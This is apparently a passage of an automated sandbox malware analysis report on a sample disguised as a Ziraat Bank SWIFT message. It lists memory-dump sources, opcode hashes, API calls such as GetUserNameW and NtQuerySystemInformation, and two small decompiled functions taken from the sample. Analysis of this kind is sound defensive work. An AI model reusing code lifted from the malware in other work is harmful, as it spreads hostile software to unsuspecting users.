                                  • Opcode ID: 505b7b80b0fe8a1cbb7aec9cc20f9cd5bec381a7b35054dcdcce1a04bd9d23d4
                                  • Instruction ID: 2a3083db6ceec1fbe404400bd7070e30a558edf598c2804eb52283a1812fd93a
                                  • Opcode Fuzzy Hash: 505b7b80b0fe8a1cbb7aec9cc20f9cd5bec381a7b35054dcdcce1a04bd9d23d4
                                  • Instruction Fuzzy Hash: 781170715007449FDB20DF55E884B66FBE4EF04320F08C4AAEE858B652D775E858DB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetUserNameW.ADVAPI32(?,00000E80,?,?), ref: 00A8BB66
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: NameUser
                                  • String ID:
                                  • API String ID: 2645101109-0
                                  • Opcode ID: 49a2f8b0162e310ea2e99d05781b5c8c6a8beb0e2b3b26c8966a2a9d7bf3de73
                                  • Instruction ID: b66fdc1769dd8497a472f3c9e77c0ad584646555c4c7e6c61a76e951c0ce08a6
                                  • Opcode Fuzzy Hash: 49a2f8b0162e310ea2e99d05781b5c8c6a8beb0e2b3b26c8966a2a9d7bf3de73
                                  • Instruction Fuzzy Hash: 9401AD71500600ABD320DF1ADC82F22FBA8FB88B20F14815AED085B741E371F915CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtQuerySystemInformation.NTDLL ref: 00A8B171
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InformationQuerySystem
                                  • String ID:
                                  • API String ID: 3562636166-0
                                  • Opcode ID: 34ee2096e4049efe9f1483da6a26d20479aca5d7a937e6e314843bd16db3d661
                                  • Instruction ID: b7f2f9d602792cba869311607cfd173bfcf7f8d22ddc08a633d52e4ce18e8bda
                                  • Opcode Fuzzy Hash: 34ee2096e4049efe9f1483da6a26d20479aca5d7a937e6e314843bd16db3d661
                                  • Instruction Fuzzy Hash: 05018B319007449FDB209F15E888B62FFA0EF04720F08C59ADE894B222D376A418DB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401E1D() {
                                  				_Unknown_base(*)()* _t1;
                                  
                                  				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                                  				return _t1;
                                  			}




                                  0x00401e22
                                  0x00401e28

                                  APIs
                                  • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                  • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                  • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1990 4055c5-4055d3 GetEnvironmentStringsW 1991 4055d5-4055d7 1990->1991 1992 4055d9-4055e8 call 40558e call 403e3d 1990->1992 1993 405610-405614 1991->1993 1997 4055ed-4055f3 1992->1997 1998 405600-40560f call 403e03 FreeEnvironmentStringsW 1997->1998 1999 4055f5-4055fd call 40acf0 1997->1999 1998->1993 1999->1998
                                  C-Code - Quality: 100%
                                  			E004055C5(void* __ecx) {
                                  				void* _t6;
                                  				void* _t14;
                                  				void* _t18;
                                  				WCHAR* _t19;
                                  
                                  				_t14 = __ecx;
                                  				_t19 = GetEnvironmentStringsW();
                                  				if(_t19 != 0) {
                                  					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                                  					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                                  					_t18 = _t6;
                                  					if(_t18 != 0) {
                                  						E0040ACF0(_t18, _t19, _t12);
                                  					}
                                  					E00403E03(0);
                                  					FreeEnvironmentStringsW(_t19);
                                  				} else {
                                  					_t18 = 0;
                                  				}
                                  				return _t18;
                                  			}







                                  0x004055c5
                                  0x004055cf
                                  0x004055d3
                                  0x004055e4
                                  0x004055e8
                                  0x004055ed
                                  0x004055f3
                                  0x004055f8
                                  0x004055fd
                                  0x00405602
                                  0x00405609
                                  0x004055d5
                                  0x004055d5
                                  0x004055d5
                                  0x00405614

                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnvironmentStrings$Free
                                  • String ID:
                                  • API String ID: 3328510275-0
                                  • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                  • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                                  • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                  • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 82c4c56ffbfd0b6570a0a8b9b48be924eb2de4afc1b9f1b4f4f93331eb5dedbf
                                  • Instruction ID: 93df7806c1b0e28b343cdc173f600d9cebf8db67bf967e4bd191e215aa8ed3da
                                  • Opcode Fuzzy Hash: 82c4c56ffbfd0b6570a0a8b9b48be924eb2de4afc1b9f1b4f4f93331eb5dedbf
                                  • Instruction Fuzzy Hash: A7C2A574A106298FCB64DF68DC54A9ABBF6BF88312F1084E6D809E7354DB349E85CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6983c4f628056341fb0ee5b13afd56d6f8ebe74d25d47a211d037ce521670870
                                  • Instruction ID: 2746189e6552ee8447fbb5dc92f369dc71222db5d9a82a6d178b0778c9eb01ed
                                  • Opcode Fuzzy Hash: 6983c4f628056341fb0ee5b13afd56d6f8ebe74d25d47a211d037ce521670870
                                  • Instruction Fuzzy Hash: 137275B8A106299FCB64DF68DC54A99BBF5BF48312F1085E6E90DA3310DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 344219088ce0ca645c1d1e721928b62b7102bf2604270b776d6488fa08b0fd9f
                                  • Instruction ID: 621dc1dc9d19b3f850fde82a2aa288bdc94a1bf662b05f4fadf84eb5e5a2f25c
                                  • Opcode Fuzzy Hash: 344219088ce0ca645c1d1e721928b62b7102bf2604270b776d6488fa08b0fd9f
                                  • Instruction Fuzzy Hash: 527286B8A106299FCB64DF68DC54A99BBF5BF48312F1085E6E90DA3310DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fd7c693693cefb58aa55d880c129701c6ec892d6b925532fc2c3b10a50c76363
                                  • Instruction ID: d6985e3cd08e716ccee49b98d12a3047018914f12f65fc582dfb3be882bae619
                                  • Opcode Fuzzy Hash: fd7c693693cefb58aa55d880c129701c6ec892d6b925532fc2c3b10a50c76363
                                  • Instruction Fuzzy Hash: F67285B8A106299FCB64DF68DC54A99BBF6BF48312F1085E6E90DA3310DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ff3c3e6a9d01ca1cb226138d90af2b5480844cccc43e3314bbda0ae5467d45a8
                                  • Instruction ID: 062f95a51eec1086467968d4c91df1656577614c35c151994b6d483929349cab
                                  • Opcode Fuzzy Hash: ff3c3e6a9d01ca1cb226138d90af2b5480844cccc43e3314bbda0ae5467d45a8
                                  • Instruction Fuzzy Hash: 8E7286B8A106299FCB64DF68DC54A99BBF6BF48312F1085E6E90DA3310DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 38f91da4d893f7e2125bb19f129f651eec466f9f51d95cc18dc2df9604c54373
                                  • Instruction ID: 183da53c6bba212636e4bd62e9817fd7c1d426ecf1f69e26770b05f84b286073
                                  • Opcode Fuzzy Hash: 38f91da4d893f7e2125bb19f129f651eec466f9f51d95cc18dc2df9604c54373
                                  • Instruction Fuzzy Hash: 5C7286B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6E90DA3310DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c844dc3393497e20394d9ea0bce892722190f13630c3490b96b42b7b26f5bbf2
                                  • Instruction ID: 04f962002fd9cf480b0f3e2ee6da33d30b78a2b27bc8700b60b9f10e45e68e7a
                                  • Opcode Fuzzy Hash: c844dc3393497e20394d9ea0bce892722190f13630c3490b96b42b7b26f5bbf2
                                  • Instruction Fuzzy Hash: D96286B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6E90DA3310DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3db60a6d42ef8b85041fc3cc18c60a47d87fed250b956cc1b3eb5b6b34933b35
                                  • Instruction ID: 90ff196614519b00c0d49e404c555010ae6f681ffb0c803e5fddba5ea3d44ffe
                                  • Opcode Fuzzy Hash: 3db60a6d42ef8b85041fc3cc18c60a47d87fed250b956cc1b3eb5b6b34933b35
                                  • Instruction Fuzzy Hash: E36296B8A106299FCB64DF68DC54A99BBF1BF48312F1085E6E90DA3310DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6de1fdb240d0c4454f8ae210675b5b353559a6031bb4d1cfdb08828e73384200
                                  • Instruction ID: b46c0e5f4958bc02970d5f80e7ab20a6f64aa5784957c87af74dfa6d642cb662
                                  • Opcode Fuzzy Hash: 6de1fdb240d0c4454f8ae210675b5b353559a6031bb4d1cfdb08828e73384200
                                  • Instruction Fuzzy Hash: 6B6297B8A106299FCB64DF68DC54A99BBF1BF48312F1085E6E90DA3310DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 31dcdebeaf66bab2887f885123324ca1dba0b7c199498668accd4a1f61f78380
                                  • Instruction ID: f7fb7743197fc3ebeea700496c538ea91c5cbd814a772a47586fa95a4370549c
                                  • Opcode Fuzzy Hash: 31dcdebeaf66bab2887f885123324ca1dba0b7c199498668accd4a1f61f78380
                                  • Instruction Fuzzy Hash: F26287B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6E90DA3350DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d10f8226694b7d5b84262a685489fc2c15577ed7bd6f89d6d6a23ac660dca978
                                  • Instruction ID: 653a98f83f87d29e7af499d7259d4f7c77415567278eaba7926f2fe3cc4922fa
                                  • Opcode Fuzzy Hash: d10f8226694b7d5b84262a685489fc2c15577ed7bd6f89d6d6a23ac660dca978
                                  • Instruction Fuzzy Hash: A56297B8A106299FCB64DF68DC54A99BBF1BF48312F1085E6E90DA3350DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 98617de5ffe38f99a50f2257c863e8fdf3b9434836e99e5cb728fce886f30b85
                                  • Instruction ID: 5cf22b5c6770f250e24ca6801a595bd0f4eaa2464c221b19dd7e6f70749cc6bf
                                  • Opcode Fuzzy Hash: 98617de5ffe38f99a50f2257c863e8fdf3b9434836e99e5cb728fce886f30b85
                                  • Instruction Fuzzy Hash: AC5297B8A106299FCB64DF68DC54A99BBF1BF48312F1085E6E90DA3350DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fa869a50a2e02787a9ea28479f5035b9edd2d8d7d0f2ccb1fba5a4d0f275ae76
                                  • Instruction ID: 02cd64907664d8fade1140788d6661efa093372431db32f2d5e7fbb4df43b362
                                  • Opcode Fuzzy Hash: fa869a50a2e02787a9ea28479f5035b9edd2d8d7d0f2ccb1fba5a4d0f275ae76
                                  • Instruction Fuzzy Hash: AE5287B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6E90DA3350DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cfffe710162db62021630b4172e5c6579e26b34d9cf9f1f14c8d68a4d6b055d0
                                  • Instruction ID: a47673b1ef9dd6b2c44ca89cf251b520e3be987a2d04dc1ccaaf9a8b694aebd6
                                  • Opcode Fuzzy Hash: cfffe710162db62021630b4172e5c6579e26b34d9cf9f1f14c8d68a4d6b055d0
                                  • Instruction Fuzzy Hash: 505297B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6E90DA3350DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b84bdd696ee76753b39a45fff755942ef1b522753f8db80e9570d4eaff267151
                                  • Instruction ID: de1f01ca3280f3f2e95d2bbfc3b29274ccc9abfa7d5765b7b14474ec66f209be
                                  • Opcode Fuzzy Hash: b84bdd696ee76753b39a45fff755942ef1b522753f8db80e9570d4eaff267151
                                  • Instruction Fuzzy Hash: 825297B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6E90DA3310DB345E85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 71932513ef353f9244e176397d3fd8ffbe7f8d9ffc07affdd51e7d3787a795be
                                  • Instruction ID: 4a38d1a5f31a9187df5940c7ddbd7b62205775724a4280fb47baa1edda0f5dc1
                                  • Opcode Fuzzy Hash: 71932513ef353f9244e176397d3fd8ffbe7f8d9ffc07affdd51e7d3787a795be
                                  • Instruction Fuzzy Hash: EE5297B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6E90DA3310DB345E85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 080d2d2669480aee387aa64d739ae5b4823a8127d6288f2f731164baa172c41d
                                  • Instruction ID: 31b3bf38d280dc558c6a71ad10e97c3c83daa398c2028a2a36dd59b1c50f0299
                                  • Opcode Fuzzy Hash: 080d2d2669480aee387aa64d739ae5b4823a8127d6288f2f731164baa172c41d
                                  • Instruction Fuzzy Hash: 534297B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6E90DA3310DB345E85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 815df358c2a51be4ba71cf72c593d093f13bb0c573322e82d9ad17245416f738
                                  • Instruction ID: e22c21b736397c3037fb6c25e4c8ce67031f01f3dba8793dce511deea9afa509
                                  • Opcode Fuzzy Hash: 815df358c2a51be4ba71cf72c593d093f13bb0c573322e82d9ad17245416f738
                                  • Instruction Fuzzy Hash: DD42A7B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6E90DA3310DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3e46b80110622dfefc0899d4bce06e5f48218d3062079bc2edadca3271b97917
                                  • Instruction ID: 054a0172c096cfefd01c16c660f76eb0ad049c3d5bd0954be7f1b09d9eddb80a
                                  • Opcode Fuzzy Hash: 3e46b80110622dfefc0899d4bce06e5f48218d3062079bc2edadca3271b97917
                                  • Instruction Fuzzy Hash: CF42A7B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6E90DA3310DB345E85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 94421668f7d97af091b7692bfa16d32abe1e638c2b150645d052835609a9e93e
                                  • Instruction ID: 1e8b07da51eef02ec372cc138bd803a859b61a817901ade0bf8d715b905ded02
                                  • Opcode Fuzzy Hash: 94421668f7d97af091b7692bfa16d32abe1e638c2b150645d052835609a9e93e
                                  • Instruction Fuzzy Hash: A942B6B8A106298FCB64DF68DC54A99BBF2BF48312F1085E6E90DA3350DB345E85CF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c80cb6c0bdaed9763486f7ff981cb8a140afe3a88ef5eb1f63182a91ac7b6dd1
                                  • Instruction ID: 17690348a960cc3d28609da315a1cc9e692627fc314122f20c33cc6bedc45bec
                                  • Opcode Fuzzy Hash: c80cb6c0bdaed9763486f7ff981cb8a140afe3a88ef5eb1f63182a91ac7b6dd1
                                  • Instruction Fuzzy Hash: 6942A6B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6D90DA3310DB345E85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 408e4ab75e8a84bee5a7beb176638599c30b4aff130f200998f325c8b384b86b
                                  • Instruction ID: 21b2eb70751b0eea73f1ef394c07cecec6e889eb30b894f1e2a74a9e43c4b830
                                  • Opcode Fuzzy Hash: 408e4ab75e8a84bee5a7beb176638599c30b4aff130f200998f325c8b384b86b
                                  • Instruction Fuzzy Hash: 4B3296B8A106299FCB64DF68DC54A99BBF2BF48312F1085E6D90DA3310DB346E85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8ed0ecc877c47c36aadf227ffbbbea62850bc7cc269668ceb4bdf853d11830ac
                                  • Instruction ID: 2fbae316aebee584ac6e98f19176aaad55a1e3436eedc9a1d81b280369fcb16f
                                  • Opcode Fuzzy Hash: 8ed0ecc877c47c36aadf227ffbbbea62850bc7cc269668ceb4bdf853d11830ac
                                  • Instruction Fuzzy Hash: 053295B8A106299FCB64DF68DC54B99BBF2AF48312F1085E6D90DA3310DB346E85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 116ddeba37b0f75c3147afa6e9a44d44185cf74110b23e661261c0d9d642a6f7
                                  • Instruction ID: f86dc6ad23c6d4cbe0566b435dbc4ea9f01579f81d955a15cfbdfefac875d12a
                                  • Opcode Fuzzy Hash: 116ddeba37b0f75c3147afa6e9a44d44185cf74110b23e661261c0d9d642a6f7
                                  • Instruction Fuzzy Hash: 0432A5B4A106299FCB64DF68DC54B99BBF2AF48312F1085E6D90DA3310DB34AE85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a2713588827827ace058825b7b872dbd40d86bbab5794f43f0f65f771a91ee4b
                                  • Instruction ID: 61a1b7100908f1fdac807686de4f509807d472cce8618ea93abb43ab6b7a9ed8
                                  • Opcode Fuzzy Hash: a2713588827827ace058825b7b872dbd40d86bbab5794f43f0f65f771a91ee4b
                                  • Instruction Fuzzy Hash: 7032A5B4A106299FCB64DF68DC54B99BBF2AF48312F1085E6D90DA3310DB34AE85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
